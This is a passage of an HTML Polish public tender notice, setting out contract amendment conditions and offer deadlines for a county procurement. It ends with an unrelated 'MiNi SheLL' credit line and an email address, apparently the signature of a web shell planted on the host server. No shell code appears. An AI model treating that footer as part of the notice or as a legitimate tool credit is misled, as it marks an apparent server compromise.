class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> §10<br/>Zmiana postanowień umowy<br/><br/>3.	Dopuszcza się zmianę umowy w zakresie ilości przedmiotu umowy oraz wartości umowy <br/><br/>4.	W sytuacji wystąpienia siły wyższej, przez którą rozumie się okoliczności nadzwyczajne, nieprzewidywalne lub też niemożliwe do uniknięcia, w szczególności: klęski żywiołowe, katastrofy, strajki, zamieszki, embarga, stany epidemii, stany nadzwyczajne, w tym stany klęski żywiołowej, decyzje, zarządzenia organów państwa itp., która w bezpośredni sposób wpłynie na okoliczności realizacji umowy, dopuszcza się zmianę umowy w zakresie:<br/>a)	terminu realizacji dostaw cząstkowych poprzez jego wydłużenie, o czas umożliwiający realizację dostawy nie dłuższy jednak niż 1 miesiąc od dnia złożenia zamówienia<br/>b)	asortymentu będącego przedmiotem umowy poprzez jego zastąpienie innym asortymentem, spełniającym warunki określone w ust. 9 poniżej.<br/>Przedmiotowe zmiany będą wprowadzone aneksem, na podstawie uzasadnionego oraz udokumentowanego wniosku Wykonawcy i będą obowiązywać przez okres występowania okoliczności „siły wyższe”. Po jej ustaniu Strony powrócą do pierwotnych zapisów umownych w drodze aneksu do umowy. <br/>5.	Dopuszcza się zmianę umowy w zakresie przedmiotu zamówienia w sytuacji gdy nastąpi zmiana numerów katalogowych produktów, przy jednoczesnym zastrzeżeniu braku zmian cen na wyższe oraz jednoczesnym podtrzymaniu co najmniej parametrów przedmiotu zamawianego.<br/>6.	Dopuszcza się zmianę umowy w zakresie terminu jej obowiązywania<br/>7.	Dopuszcza się zmianę umowy w zakresie ceny przedmiotu umowy <br/>8.	Dopuszcza się zmianę umowy w zakresie przedmiotowym, to jest zastąpienie produktu objętego umową odpowiednikiem w przypadku:<br/>a)	zaprzestania wytwarzania przez producenta asortymentu objętego umową,<br/>b)	wygaśnięcia świadectwa rejestracji,<br/>c)	przedłożenia przez wykonawcę oferty korzystniejszej dla Zamawiającego.<br/><br/>11.	Dopuszcza się także zmianę umowy w zakresie przedmiotowym poprzez dodanie numeru katalogowego towaru <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-29 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://powiattorunski.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-29 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com